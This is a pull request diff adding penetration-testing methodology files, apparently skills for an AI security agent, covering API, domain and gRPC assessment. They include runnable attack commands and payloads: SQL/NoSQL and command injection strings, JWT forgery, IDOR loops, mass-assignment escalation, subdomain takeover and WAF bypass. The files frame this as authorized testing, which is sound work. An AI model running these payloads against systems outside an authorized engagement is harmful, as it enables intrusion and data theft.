### PR TITLE
feat(skills): web asset methodology skills

### DIFF
--- a/strix/skills/web/api_security.md
+++ b/strix/skills/web/api_security.md
@@ -1,0 +1,183 @@
+---
+name: api_security
+description: Methodology for assessing HTTP APIs (REST/GraphQL/gRPC-web) — enumerate endpoints and auth, then validate authz, injection, and logic flaws.
+---
+
+# API Security
+
+An API asset (kind: url) is a programmatic HTTP surface — REST, GraphQL, gRPC-web, SOAP, or JSON-RPC — that exposes business logic and data over predictable, often documented, endpoints. Unlike rendered web apps, APIs trust the caller far more: there is no DOM, no CSRF token UI flow, and frequently weak per-object and per-function authorization. The attacker's objective is to first map every endpoint, parameter, and authentication scheme, then escalate by abusing broken object-level authorization (BOLA/IDOR), broken function-level authorization (BFLA), injection, mass assignment, and business-logic gaps to read or mutate data belonging to other tenants or to act as a higher-privileged role.
+
+## Attack Surface
+
+- **Endpoints**: versioned paths (`/api/v1`, `/v2`, `/internal`), resource collections (`/users/{id}`), RPC actions (`/rpc`, `/graphql`), admin routes (`/admin`, `/actuator`, `/debug`).
+- **Auth schemes**: Bearer/JWT, API keys (header/query), OAuth2 token endpoints, HMAC-signed requests, mTLS, session cookies, basic auth on internal endpoints.
+- **Parameters**: path IDs, query filters, JSON/XML bodies, headers (`X-User-Id`, `X-Tenant`, `X-Forwarded-For`), multipart uploads, GraphQL variables.
+- **Specs & discovery docs**: `openapi.json`, `swagger.json`, `/swagger-ui`, `/api-docs`, `/graphql` introspection, `.well-known/`, WSDL, `apple-app-site-association`, gRPC reflection.
+- **Hidden methods/verbs**: endpoints that only accept `PUT`/`PATCH`/`DELETE`, `OPTIONS`-revealed verbs, HTTP method override headers (`X-HTTP-Method-Override`).
+- **Indirect surface**: webhooks/callbacks, rate-limit and quota logic, pagination cursors, bulk/batch endpoints, file import/export jobs.
+
+## Recon & Enumeration
+
+```bash
+# Resolve host + alive probing with tech/title/status/tls metadata
+echo "api.target.tld" | httpx -json -td -title -sc -server -tls-probe -o httpx.jsonl
+# Port + service map (catch non-443 API listeners, gRPC, admin ports)
+naabu -host api.target.tld -top-ports 1000 -o naabu.txt
+nmap -sV -sC -Pn -p- --min-rate 2000 api.target.tld -oA nmap_api
+
+# Discover spec/docs files — these collapse recon time dramatically
+ffuf -u https://api.target.tld/FUZZ -mc 200,401,403 \
+  -w <(printf '%s\n' openapi.json swagger.json swagger/v1/swagger.json \
+  api-docs v2/api-docs api-docs.json apidocs swagger-ui.html swagger-ui/ \
+  graphql graphql/console graphiql playground .well-known/openapi)
+
+# Crawl JS bundles for endpoints, keys, and route fragments
+katana -u https://api.target.tld -jc -kf all -d 3 -o katana.txt
+subfinder -d target.tld -all -silent | httpx -silent -o api_subs.txt
+
+# Brute endpoints/params when no spec exists
+ffuf -u https://api.target.tld/api/v1/FUZZ -w api-wordlist.txt -mc all -fc 404 -o ffuf_ep.json
+ffuf -u 'https://api.target.tld/api/v1/users?FUZZ=1' -w params.txt -mc 200 -fs 0  # param mining
+
+# WAF + automated checks
+wafw00f https://api.target.tld
+nuclei -u https://api.target.tld -tags exposure,misconfig,api,swagger,graphql \
+  -s critical,high,medium -rl 40 -c 15 -timeout 10 -j -o nuclei_api.jsonl
+# Feed an OpenAPI spec directly to nuclei for spec-driven coverage
+nuclei -l openapi.json -im openapi -as -s critical,high -j -o nuclei_spec.jsonl
+
+# Secret hunting in leaked specs, source, or mobile clients
+trufflehog filesystem ./downloaded_specs --json > tru.json
+gitleaks detect --source ./repo --report-path gitleaks.json
+semgrep --config p/secrets --config p/owasp-top-ten ./repo
+```
+
+Asset-specific tooling to install when relevant:
+- GraphQL: `pip install graphql-cog || go install github.com/dolevf/graphql-cop@latest`; `clairvoyance` for schema recovery against disabled introspection (`pip install clairvoyance`).
+- gRPC-web/reflection: `go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest`.
+- JWT analysis: `jwt_tool` (already in sandbox) — `pip install jwt_tool` if absent.
+- Spec replay/fuzz: `pip install schemathesis`; run `st run openapi.json --checks all`.
+- Postman/Insomnia collection import for auth flows; `mitmproxy`/`Caido` for capture-replay.
+
+## Methodology
+
+1. **Inventory the API**. Pull every OpenAPI/Swagger/WSDL spec and GraphQL introspection. Where introspection is disabled, recover the schema with `clairvoyance`. Crawl JS with `katana` and grep for fetch/axios URLs and route tables.
+2. **Map authentication**. Identify each scheme (JWT vs API key vs cookie vs HMAC). Capture a valid token. Decode JWTs (`jwt_tool <token>`), note `alg`, `kid`, claims (`role`, `tenant`, `sub`, `scope`), and expiry.
+3. **Establish role/identity matrix**. Obtain at least two accounts (low-priv A, low-priv B) plus an unauthenticated baseline, ideally a high-priv account. This matrix is the foundation of every authz test.
+4. **Test object-level authz (BOLA/IDOR)**. For every endpoint with an ID, replay account-A requests using account-B's token (and vice versa) and unauthenticated. Increment, decrement, swap UUIDs, and try predictable IDs.
+5. **Test function-level authz (BFLA)**. Replay admin/privileged endpoints with low-priv tokens and no token. Swap HTTP verbs and method-override headers.
+6. **Test injection**. SQL/NoSQL/command/SSTI/XXE/LDAP across JSON bodies, query params, and headers — APIs frequently skip the input validation that the UI enforced.
+7. **Test mass assignment & input handling**. Add unexpected fields (`isAdmin`, `role`, `verified`, `balance`) to write requests; flip read-only fields.
+8. **Test business logic & rate limits**. Race conditions on financial/quota endpoints, negative quantities, replayed idempotency keys, broken state machines.
+9. **Validate, score, document**. Build a minimal reproducible PoC per finding (curl + exact tokens/IDs), confirm cross-account impact, and stop at minimal-impact proof.
+
+## Key Weaknesses / Techniques
+
+### BOLA / IDOR (object-level authz)
+Most common and highest-impact API flaw. Replay another tenant's resource with your own credentials.
+```bash
+# Account B's token requesting Account A's order
+curl -s https://api.target.tld/api/v1/orders/1042 -H "Authorization: Bearer $TOKEN_B"
+# Iterate IDs to confirm horizontal access
+for id in $(seq 1000 1100); do
+  curl -s -o /dev/null -w "%{http_code} $id\n" \
+    https://api.target.tld/api/v1/users/$id/profile -H "Authorization: Bearer $TOKEN_B"
+done
+```
+Also test UUID swaps, nested IDs (`/accounts/A/cards/B`), and IDs hidden in JSON bodies, not just paths.
+
+### BFLA (function-level authz)
+Low-priv or anonymous calls to privileged actions.
+```bash
+# Low-priv token hitting an admin route
+curl -s -X DELETE https://api.target.tld/api/v1/admin/users/5 -H "Authorization: Bearer $TOKEN_LOW"
+# Verb tampering / method override when DELETE/PUT is blocked at the edge
+curl -s -X POST https://api.target.tld/api/v1/admin/users/5 \
+  -H "X-HTTP-Method-Override: DELETE" -H "Authorization: Bearer $TOKEN_LOW"
+```
+
+### Broken authentication / JWT abuse
+```bash
+jwt_tool "$JWT" -M at        # all attack modes / playbook
+jwt_tool "$JWT" -X a         # alg:none (none/None/NONE) signature strip
+jwt_tool "$JWT" -X k -pk key.pem    # confused-deputy RS256->HS256 with public key as HMAC secret
+jwt_tool "$JWT" -C -d wordlist.txt  # crack weak HMAC secret
+```
+Also: expired-token acceptance, missing signature verification, `kid` SQLi/path traversal, JWKS spoofing, and accepting tokens from a sibling service/audience.
+
+### Injection (validation gap vs UI)
+```bash
+sqlmap -u 'https://api.target.tld/api/v1/search?q=1' \
+  --headers="Authorization: Bearer $TOKEN" --level 3 --risk 2 --batch
+# NoSQL operator injection in JSON body
+curl -s https://api.target.tld/api/v1/login -H 'Content-Type: application/json' \
+  -d '{"user":"admin","pass":{"$ne":""}}'
+# SSTI in fields rendered server-side (mailers, PDF, templates)
+curl -s -X POST https://api.target.tld/api/v1/profile -H "Authorization: Bearer $TOKEN" \
+  -d '{"name":"${7*7}"}' ; # also try {{7*7}}, #{7*7}, <%= 7*7 %>
+```
+For XXE, send `Content-Type: application/xml` even to JSON endpoints — many parsers accept both.
+
+### Mass assignment / excessive data exposure
+```bash
+# Inject privileged fields the UI never sends
+curl -s -X PATCH https://api.target.tld/api/v1/users/me -H "Authorization: Bearer $TOKEN" \
+  -H 'Content-Type: application/json' \
+  -d '{"email":"x@x.tld","role":"admin","emailVerified":true,"accountId":1}'
+```
+Excessive exposure: a GET that returns full objects (password hashes, internal flags, other users' PII) where the UI only renders a subset.
+
+### GraphQL-specific
+```bash
+# Introspection dump
+curl -s https://api.target.tld/graphql -H 'Content-Type: application/json' \
+  -d '{"query":"{__schema{types{name fields{name}}}}"}'
+graphql-cop -t https://api.target.tld/graphql   # batching/introspection/DoS checks
+```
+Test query batching to bypass rate limits and brute-force, alias-based amplification, deeply nested queries (DoS), and per-field authz gaps.
+
+### Business logic & rate limits
+- Race conditions on coupon/withdraw/transfer endpoints (`turbo intruder`/parallel curl) — see race_conditions skill.
+- Negative or oversized quantities, currency/price tampering, replayed idempotency keys.
+- Missing rate limits on OTP/login/reset → enumeration and brute force.
+
+## Validation
+
+1. **Reproduce deterministically**: a single curl with the exact token, method, headers, and body that triggers the issue, runnable twice with the same result.
+2. **Prove cross-boundary access for authz bugs**: show account B reading/mutating account A's data, or a low-priv token performing an admin action — include both the unauthorized success and the expected `403` from a correctly scoped request.
+3. **Prove injection with a controlled oracle**: boolean/time-based DB differential, or an OAST hit (`interactsh-client -v`, embed the `*.oast.fun` host) for blind SSRF/RCE/SSTI — confirm the callback source is the server, not your client.
+4. **Minimal-impact PoC only**: read one benign record or echo a marker value; do not bulk-exfiltrate or mutate production data beyond proof.
+5. **Capture evidence**: request/response pairs, token claims used, and the specific parameter under attacker control.
+
+## False Positives
+
+- A `200` from an IDOR attempt that returns the **caller's own** object (server ignored the path ID) — confirm the data actually belongs to the other tenant.
+- `401/403` enforced at the edge/gateway but the documented endpoint is simply unauthenticated by design (public catalog, health, metrics).
+- Reflected `${7*7}`/`{{7*7}}` echoed verbatim (no evaluation) — not SSTI unless it computes `49`.
+- "Secrets" in specs/JS that are public client IDs, sandbox keys, or test fixtures — verify they authenticate against the live API.
+- Verbose error messages on a non-production/staging host out of scope.
+- nuclei swagger/exposure hits where the endpoint requires valid auth or returns a generic deny — confirm content, not just status.
+- Rate-limit "bypass" caused by your own IP rotation while the real limit is per-account.
+
+## Chaining & Impact
+
+- **BOLA + excessive exposure** → bulk PII/data exfiltration across all tenants by iterating IDs.
+- **Mass assignment (`role:admin`) → BFLA** → full account takeover and admin API control.
+- **JWT alg confusion / weak secret** → forge arbitrary `sub`/`role` → impersonate any user, including admin.
+- **SSRF via URL/webhook parameter → cloud metadata** → IAM credentials → control-plane access (see ssrf skill).
+- **SQLi → DB read → password hashes / session tokens** → authenticated pivot to higher-priv functions.
+- **GraphQL batching → auth brute force / rate-limit bypass** → credential stuffing at scale.
+- **Leaked spec/key (trufflehog) → authenticated enumeration** → turns a black-box test into a privileged one.
+
+## Pro Tips
+
+1. Always test the unauthenticated baseline first — surprisingly many "internal" or admin endpoints answer with no token at all.
+2. The OpenAPI/Swagger spec is ground truth: it lists every verb, required field, and enum the UI hides. Feed it to `nuclei -im openapi` and `schemathesis` for free coverage.
+3. Keep a clean two-account replay harness; the fastest BOLA win is swapping `Authorization` headers across captured requests, not crafting new ones.
+4. Diff responses, not just status codes — a `200` with a different `Content-Length`/body for another user's ID is the real signal.
+5. Strip or rename the `Authorization` header rather than only deleting it; some gateways add a default service token when none is present.
+6. Try alternate content types (`application/xml`, `application/x-www-form-urlencoded`, JSON arrays) — parsers and validators often diverge and reopen mass-assignment/XXE.
+7. Older API versions (`/v1` when `/v2` is current) frequently lack the authz fixes of the latest — always enumerate every version.
+8. For GraphQL with introspection disabled, `clairvoyance` reconstructs the schema from error suggestions; never assume a closed schema is closed.
+9. Watch for `X-Forwarded-For`/`X-Original-URL`/`X-Real-IP` trust — header-based authz and IP allowlists are common and trivially spoofed.
+10. Rate-limit your own tooling (`nuclei -rl`, bounded `ffuf -rate`) to stay within authorized scope and avoid tripping account lockouts that block further testing.

--- a/strix/skills/web/domain.md
+++ b/strix/skills/web/domain.md
@@ -1,0 +1,154 @@
+---
+name: domain
+description: Methodology for mapping DNS, subdomains, and every web surface under an apex domain to find exploitable entry points.
+---
+
+# Domain (Apex / URL)
+
+A domain asset is the root of an organization's externally reachable footprint: an apex name (`example.com`), its DNS records, every subdomain, and the web/API/service surfaces those names resolve to. The objective is to build a complete, current map of that footprint — discover hosts the owner forgot, fingerprint the tech behind each, and convert that map into validated entry points (takeovers, exposed admin panels, leaked secrets, injectable parameters). Breadth first, then depth on the highest-signal hosts.
+
+## Attack Surface
+
+- **DNS layer** — A/AAAA/CNAME/MX/NS/TXT/SRV/CAA records, zone transfers, wildcard records, dangling CNAMEs pointing at deprovisioned cloud resources (subdomain takeover).
+- **Subdomains** — staging/dev/uat hosts, legacy apps, internal tools accidentally public, vendor-hosted names (`status.`, `mail.`, `vpn.`, `git.`, `jira.`, `*.s3`, `cdn.`).
+- **Web surfaces per host** — virtual hosts, ports beyond 80/443, reverse-proxied apps, API gateways, default/error pages revealing stack, directory listings.
+- **Edge & infra** — CDN/WAF in front (Cloudflare, Akamai, Fastly), origin-IP leakage, load balancers, S3/GCS/Azure buckets bound to vanity names.
+- **Crawlable content** — JS bundles (endpoints, API keys, internal hostnames), sitemaps, robots.txt, source maps, `.git`/`.env`/backup files left in webroot.
+- **Trust artifacts** — TLS SAN entries, CT logs, SPF/DKIM/DMARC posture, exposed metadata in HTTP headers.
+
+## Recon & Enumeration
+
+Set scope once and reuse: `export APEX=example.com`.
+
+**Passive subdomain discovery (no traffic to target):**
+```
+subfinder -d $APEX -all -recursive -silent -o subs_passive.txt
+# CT logs as a cross-check
+curl -s "https://crt.sh/?q=%25.$APEX&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u >> subs_passive.txt
+```
+
+**Active DNS resolution & brute force (dnsx is in the sandbox; install dnsrecon if needed: `pipx install dnsrecon`):**
+```
+sort -u subs_passive.txt > subs.txt
+dnsx -l subs.txt -a -aaaa -cname -resp -silent -o resolved.txt
+# brute force with a wordlist + resolved validation
+dnsx -d $APEX -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -silent -o subs_brute.txt
+# zone transfer & record sweep
+dnsrecon -d $APEX -a            # AXFR attempt + standard records
+dig +short NS $APEX; dig +short TXT $APEX; dig +short MX $APEX; dig +short CAA $APEX
+```
+
+**Port discovery (naabu then nmap on what's open):**
+```
+naabu -list <(awk '{print $1}' resolved.txt | sort -u) -top-ports 1000 -silent -o ports.txt
+nmap -iL <(cut -d: -f1 ports.txt | sort -u) -p $(cut -d: -f2 ports.txt | paste -sd,) -sV -sC --open -oA nmap_svc
+```
+
+**Probe live web surfaces & fingerprint:**
+```
+httpx -l subs.txt -sc -title -tech-detect -server -location -ip -cname -web-server \
+  -follow-redirects -json -o httpx.jsonl
+# extract live URLs for downstream tools
+jq -r 'select(.status_code) | .url' httpx.jsonl | sort -u > live_urls.txt
+wafw00f -i live_urls.txt -o wafw00f.json     # identify WAF/CDN in front
+```
+
+**Crawl, content discovery, and secret hunting:**
+```
+katana -list live_urls.txt -d 3 -jc -kf all -aff -silent -o crawl.txt   # -jc parses JS for endpoints
+ffuf -u https://FUZZ_HOST/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
+  -H "Host: target" -mc 200,204,301,302,401,403 -ac -o ffuf.json   # run per host
+# pull JS, scan for secrets/keys/internal hosts
+trufflehog filesystem ./js_dump --only-verified --json > secrets.json
+gitleaks detect --source ./repo_or_webroot -f json -r gitleaks.json   # if source/backup recovered
+```
+
+**Vulnerability sweep across the whole live set:**
+```
+nuclei -l live_urls.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+nuclei -l subs.txt -t dns/ -tags takeover -silent -o takeover.txt   # dangling CNAME / takeover templates
+```
+
+## Methodology
+
+1. **Lock scope.** Confirm the apex and any explicitly in-scope wildcards. Keep `$APEX` and an out-of-scope exclude list to filter every output.
+2. **Passive first.** Run `subfinder` + crt.sh/CT logs and DNS record pulls before sending volume — builds the map without tipping defenses.
+3. **Resolve & validate.** Run `dnsx` over the union of passive + brute results; keep only names that resolve. Note CNAMEs pointing to third-party services (takeover candidates).
+4. **Map ports.** `naabu` for breadth, `nmap -sV -sC` for depth on open ports. Flag non-web services (databases, RDP, SMB, Redis, Elasticsearch) for separate handling.
+5. **Probe & fingerprint web.** `httpx` for status/title/tech/CNAME/IP; `wafw00f` to know what edge sits in front. Cluster hosts by tech stack and by whether they sit behind a WAF.
+6. **Prioritize.** Rank hosts: non-prod (dev/staging/uat), unauthenticated admin/tooling, distinct/old tech stacks, error pages leaking stack, hosts NOT behind the WAF.
+7. **Crawl & content-discover.** `katana` (with `-jc`) plus `ffuf` per high-value host. Harvest JS for endpoints, API bases, and internal hostnames.
+8. **Hunt low-hanging exposures.** `.git/`, `.env`, `/.svn/`, backup archives, source maps, directory listings, Swagger/`/openapi.json`, `/actuator`, `/server-status`.
+9. **Scan.** `nuclei -as` for known CVEs/misconfigs; takeover templates over the full subdomain list.
+10. **Validate & escalate.** Manually confirm each candidate (next sections). Chain DNS/edge findings into application access.
+
+## Key Weaknesses / Techniques
+
+- **Subdomain takeover.** A subdomain CNAMEs to a deprovisioned third-party (S3, GitHub Pages, Heroku, Azure, Fastly) returning the provider's "no such bucket/app" page. Validate the CNAME target and fingerprint the error:
+  ```
+  dig CNAME sub.$APEX +short
+  nuclei -u https://sub.$APEX -t dns/ -tags takeover
+  ```
+  Confirm by registering the claimable resource (only with authorization) and serving a benign marker file.
+- **Zone transfer (AXFR).** Misconfigured NS leaks the full zone:
+  ```
+  for ns in $(dig +short NS $APEX); do dig AXFR $APEX @$ns; done
+  ```
+- **Origin-IP leakage behind CDN/WAF.** WAF only protects the edge; hitting the origin IP directly bypasses it. Find origin via historical DNS, SAN/CT mismatches, or a vhost that resolves outside the CDN, then:
+  ```
+  curl -sk -H "Host: $APEX" https://<origin-ip>/ -o /dev/null -w "%{http_code}\n"
+  ```
+- **Exposed VCS / config / backups.** `.git/HEAD`, `.env`, `config.php.bak`, `db.sql` in webroot. Recover and scan:
+  ```
+  curl -s https://host/.git/HEAD          # 200 + "ref: refs/..." => exposed repo
+  git-dumper https://host/.git/ ./repo    # pipx install git-dumper
+  trufflehog filesystem ./repo --only-verified
+  ```
+- **Secrets in JS bundles.** API keys, signing secrets, internal API hosts. Pull all JS from `katana`, grep for `api_key`, `Authorization`, `s3.amazonaws.com`, internal `.local`/`.internal` hosts.
+- **Virtual-host confusion / default pages.** Same IP, different `Host:` headers expose unlinked apps. Fuzz the `Host` header against discovered IPs.
+- **Injectable parameters surfaced by crawl.** Feed crawled URLs with params into `sqlmap`:
+  ```
+  sqlmap -m <(grep '=' crawl.txt) --batch --random-agent --level 2 --risk 1
+  ```
+- **Email-spoofing posture.** Weak/missing SPF/DMARC enables phishing from the domain:
+  ```
+  dig +short TXT $APEX | grep spf; dig +short TXT _dmarc.$APEX
+  ```
+- **Container/dependency exposure** (if images or SBOMs recovered): `trivy image <ref>` and `syft <ref> -o json | grype` for known-vuln components.
+
+## Validation
+
+- **Takeover:** show the dangling CNAME, the provider error fingerprint, and (authorized) a controlled claim serving a unique benign file at `https://sub.$APEX/<random>.txt`. Screenshot both the pre-claim error and post-claim marker.
+- **Origin bypass:** demonstrate identical app response from the raw origin IP that a WAF-blocked payload returns differently at the edge (same `Host` header, payload blocked at edge but served at origin).
+- **Exposed repo/secrets:** reconstruct a file from `.git`, then verify a leaked credential with a minimal authenticated call (e.g., `aws sts get-caller-identity`) — capture identity, do not act further.
+- **Injection/CVE:** reproduce with a single deterministic request; for blind classes use `interactsh-client` and embed the unique `*.oast.fun` host in the payload, then correlate the inbound hit.
+- Re-run each PoC a second time to confirm stability and record the exact request/response.
+
+## False Positives
+
+- **Wildcard DNS** makes every brute-forced name "resolve." Detect with a random label (`dig $(openssl rand -hex 6).$APEX`); if it answers, filter brute results by unique content/IP, not mere resolution.
+- **Takeover false alarms:** CNAME to a service that returns a generic 404 but is NOT actually claimable (provider verifies ownership), or the resource still exists. Confirm claimability before reporting.
+- **CDN shared IPs:** an "origin" IP that is just another CDN edge — verify it serves the app without the CDN headers, not a generic edge response.
+- **Out-of-scope hosts:** crt.sh and CT logs return sibling brands and parked domains; filter to in-scope apex/wildcards.
+- **Nuclei version/CVE matches** based on banners alone — confirm the vulnerable code path is reachable, not just a fingerprinted version string.
+- **Dev placeholder pages** ("under construction") are not exposures unless they leak config or admin functionality.
+
+## Chaining & Impact
+
+- Forgotten staging subdomain (no WAF, debug on) → exposed `.env` → DB creds → data access.
+- Dangling CNAME → subdomain takeover → host content on a trusted name → phishing / cookie theft (if cookies are scoped to the apex, session hijack across the real app).
+- Origin-IP discovery → WAF bypass → previously-blocked SQLi/RCE now reachable.
+- Leaked AWS key in JS → `aws sts get-caller-identity` → bucket enumeration → broader cloud foothold (hand off to cloud methodology).
+- Weak DMARC + lookalike subdomain → high-credibility phishing against employees.
+- Exposed `/actuator`, `/server-status`, or Swagger → internal endpoint map → authenticated API abuse.
+
+## Pro Tips
+
+1. Diff your subdomain map across runs — newly appearing dev/staging hosts during a release window are the softest targets.
+2. The host that is NOT behind the WAF is the real target; cluster `httpx` output by CNAME/IP to spot the one origin sitting outside Cloudflare/Akamai.
+3. Always `dig CNAME` every subdomain — takeovers hide in third-party CNAMEs, and they are quick, high-impact, low-noise wins.
+4. JS bundles are an endpoint goldmine; `katana -jc` plus a grep for hostnames often reveals internal APIs no crawler would otherwise find.
+5. Resolve brute-force candidates with `dnsx` before any active scan — never port-scan or fuzz names that do not resolve.
+6. Verify scope with a wildcard probe first; reporting wildcard noise as live hosts destroys credibility.
+7. Re-check CT logs (crt.sh) late in the engagement — new certs issued during testing expose freshly deployed hosts.
+8. Throttle (`-rl`, `-c`) when a WAF is detected; aggressive enumeration gets the source IP blocked and poisons the rest of the assessment.

--- a/strix/skills/web/grpc.md
+++ b/strix/skills/web/grpc.md
@@ -1,0 +1,164 @@
+---
+name: grpc
+description: gRPC service testing via reflection enumeration, method fuzzing, authz bypass, and HTTP/2 transport abuse
+---
+
+# gRPC Service
+
+A gRPC service exposes remote procedures over HTTP/2, typically serializing Protocol Buffers as the message body. Unlike REST, the contract lives in `.proto` definitions, not URLs, so the first objective is to recover that contract — via server reflection, leaked protos, or transcoding gateways — then exercise every method to find missing per-method authorization, injection sinks behind the typed interface, and HTTP/2-level transport flaws. The attacker's goal is to call privileged RPCs without authorization, smuggle malicious payloads through deserialization, and pivot from the service into backend datastores and internal microservices it fronts.
+
+## Attack Surface
+
+**Transport**
+- HTTP/2 over TLS (h2) on 443/8443, or cleartext h2c on 50051/9090/8080
+- gRPC-Web (`Content-Type: application/grpc-web[-text]`) fronted by Envoy/nginx for browsers
+- JSON/HTTP transcoding gateways (`grpc-gateway`, Envoy `grpc_json_transcoder`) exposing RPCs as REST
+
+**Contract & Methods**
+- Server reflection service (`grpc.reflection.v1alpha.ServerReflection`, `grpc.reflection.v1`) — leaks every service, method, and message type
+- `grpc.health.v1.Health/Check`, `grpc.channelz`, and `grpc.server.reflection` housekeeping services
+- Streaming RPCs (client-stream, server-stream, bidi) — often weaker rate limiting and auth than unary
+
+**Auth & Metadata**
+- Per-RPC credentials in metadata: `authorization: Bearer ...`, `x-api-key`, mTLS client certs, `cookie`
+- Interceptors enforcing authn/authz — frequently applied unevenly across methods
+
+**Indirect**
+- Backend datastores, queues, and downstream gRPC services the methods proxy to
+- Protobuf field-mask / `Any` / `oneof` handling, and the deserializer itself
+
+## Recon & Enumeration
+
+Install gRPC tooling (not in base Kali). `grpcurl` is the primary client; `ghz` for load/streaming; `buf` for proto handling:
+
+```bash
+# grpcurl + ghz (Go) — pull static binaries
+GO111MODULE=on go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest
+GO111MODULE=on go install github.com/bojand/ghz/cmd/ghz@latest
+# or release tarballs:
+curl -sL https://github.com/fullstorydev/grpcurl/releases/latest/download/grpcurl_linux_x86_64.tar.gz | tar -xz -C /usr/local/bin grpcurl
+# proto tooling
+apt-get install -y protobuf-compiler && go install github.com/bufbuild/buf/cmd/buf@latest
+# browser/Envoy front: grpcui for interactive method calls
+go install github.com/fullstorydev/grpcui/cmd/grpcui@latest
+```
+
+```bash
+# 1. Find the port and confirm HTTP/2 / gRPC
+nmap -p- --min-rate 2000 -sV target.tld -oA grpc_ports        # locate 50051/8443/9090
+naabu -host target.tld -p 50051,9090,8080,443,8443 -silent
+httpx -u https://target.tld:8443 -http2 -tech-detect -title    # ALPN h2 confirms HTTP/2
+
+# 2. Probe server reflection (cleartext h2c)
+grpcurl -plaintext target.tld:50051 list
+grpcurl -plaintext target.tld:50051 list pkg.v1.AccountService
+grpcurl -plaintext target.tld:50051 describe pkg.v1.AccountService.GetUser
+
+# 3. TLS endpoint (skip cert verify only in authorized testing)
+grpcurl -insecure target.tld:443 list
+grpcurl -d @ -insecure target.tld:443 pkg.v1.AccountService/GetUser <<<'{"id":"1"}'
+
+# 4. If reflection is OFF, supply a proto or import set
+grpcurl -proto api.proto -import-path ./protos -plaintext target.tld:50051 list
+buf curl --schema ./protos --protocol grpc http://target.tld:50051/pkg.v1.Svc/Method
+
+# 5. gRPC-Web / transcoding gateway recon (looks like REST)
+katana -u https://app.tld -jc -d 3 | httpx -mc 200 -silent       # find /v1/... transcoded routes
+ffuf -u https://target.tld:8443/FUZZ -w grpc-services.txt -H "Content-Type: application/grpc"
+nuclei -u https://target.tld:8443 -tags grpc,http2 -s critical,high -silent
+
+# 6. Hunt protos/secrets in source to rebuild the contract offline
+gitleaks dir . --no-banner ; trufflehog filesystem . --only-verified
+semgrep --config p/secrets --config p/grpc .                     # missing authz interceptors, insecure creds
+grep -rn "grpc.WithInsecure\|insecure.NewCredentials\|reflection.Register" .
+```
+
+## Methodology
+
+1. **Locate transport.** Port-scan for h2/h2c; confirm HTTP/2 via ALPN (`httpx -http2`). Distinguish native gRPC (`application/grpc`), gRPC-Web, and JSON-transcoding gateways — each needs a different client.
+2. **Recover the contract.** Try reflection first (`grpcurl list`). If disabled, harvest `.proto` files from JS bundles, mobile APKs (`jadx`), GitHub, OpenAPI/Swagger of the gateway, or Envoy config. Reconstruct a descriptor set with `buf` or `protoc --descriptor_set_out`.
+3. **Map every method.** `describe` each service to record method names, input/output messages, streaming type, and which fields are required. Note housekeeping services (Health, Channelz, Reflection) that should not be public.
+4. **Establish an authed baseline.** Capture a legitimate session's metadata (`authorization`, `x-api-key`, mTLS cert) so you can diff authorized vs unauthorized behavior per method.
+5. **Test authorization per method.** Call each RPC with no metadata, an expired/other-tenant token, and a low-privilege token. Authz in gRPC is enforced by interceptors that are easy to forget on individual methods.
+6. **Fuzz inputs.** Mutate every field — IDs, field masks, `oneof` selectors, nested messages, `bytes`, and `Any`-typed fields — to probe IDOR, injection (SQL/NoSQL/command behind the typed surface), and deserialization issues.
+7. **Probe transport.** Test h2c upgrade, large/compressed messages (decompression bombs), header smuggling via metadata, and trailer handling.
+8. **Validate & chain.** Confirm each finding with a reproducible `grpcurl` PoC; chain leaked contract + missing authz into cross-tenant data access or backend pivot.
+
+## Key Weaknesses / Techniques
+
+**Reflection / contract disclosure**
+- Public reflection lets anyone enumerate the full API: `grpcurl -plaintext target:50051 list` then `describe`. Treat this as information disclosure that unlocks every other test. Even with reflection off, `describe` works once a proto is supplied.
+
+**Missing or inconsistent per-method authorization (IDOR / BOLA)**
+- Call privileged RPCs with no credentials or another tenant's ID. Interceptors often guard `AdminService` but skip a newer method.
+```bash
+# No auth at all
+grpcurl -plaintext -d '{"user_id":"1001"}' target:50051 pkg.v1.AccountService/GetUser
+# Cross-tenant: valid token from tenant A, ask for tenant B's object
+grpcurl -H "authorization: Bearer $TOKEN_A" -d '{"account_id":"B-2002"}' \
+  -insecure target:443 pkg.v1.BillingService/GetInvoice
+```
+
+**Injection behind the typed interface**
+- String fields flow into SQL/NoSQL/OS calls server-side. Smuggle payloads in message fields:
+```bash
+grpcurl -plaintext -d '{"username":"admin'\'' OR 1=1-- -"}' target:50051 pkg.v1.AuthService/Login
+grpcurl -plaintext -d '{"path":"; id #"}' target:50051 pkg.v1.FileService/Read
+```
+- For deep DBMS testing, transcode to JSON via the gateway and point `sqlmap` at the REST route, or proxy gRPC-Web through Burp.
+
+**h2c cleartext smuggling / downgrade**
+- Services bound to h2c (`-plaintext`) behind a TLS proxy may be reachable directly, bypassing the proxy's auth/WAF. Confirm by hitting the backend port without TLS.
+
+**Metadata / header abuse**
+- Spoof identity headers a trusting interceptor reads: `-H "x-user-id: 1"`, `-H "x-forwarded-for: 127.0.0.1"`, `-H "x-internal: true"`. Test JWTs in `authorization` with `jwt_tool $JWT -X a` (alg confusion / none).
+
+**Resource exhaustion / message bombs**
+- Servers without `MaxRecvMsgSize` limits accept oversized or compression-bombed messages. Validate impact cautiously and bounded:
+```bash
+ghz --insecure --call pkg.v1.Svc/Echo -d '{"blob":"'"$(head -c 1000000 /dev/zero | base64)"'"}' \
+    -c 1 -n 5 target:443       # observe memory/latency, keep volume low
+```
+
+**Streaming auth gaps**
+- Auth may be checked at stream open but not per-message; long-lived bidi streams can outlive token expiry. Open a stream with a soon-to-expire token and keep sending.
+
+**gRPC-Web / transcoding parser differentials**
+- The gateway and backend may validate differently. Send malformed `application/grpc-web-text` (base64 framing) or oversized JSON to reach states the native path blocks.
+
+## Validation
+
+1. Reproduce with a single deterministic `grpcurl` (or `buf curl`) command and capture full output; record the exact method, metadata, and message.
+2. For authz findings, show the same RPC succeeding with no/low-priv credentials and returning another principal's data — diff against the authorized baseline to prove it is a real bypass, not your own object.
+3. For injection, demonstrate a controlled, non-destructive oracle (boolean/time-based) or harmless data read; avoid mutating RPCs.
+4. For reflection/info disclosure, save the enumerated service+method list as evidence.
+5. For blind backend calls (SSRF-like proxying), confirm egress with `interactsh-client` and embed the OAST domain in a URL/host field.
+
+## False Positives
+
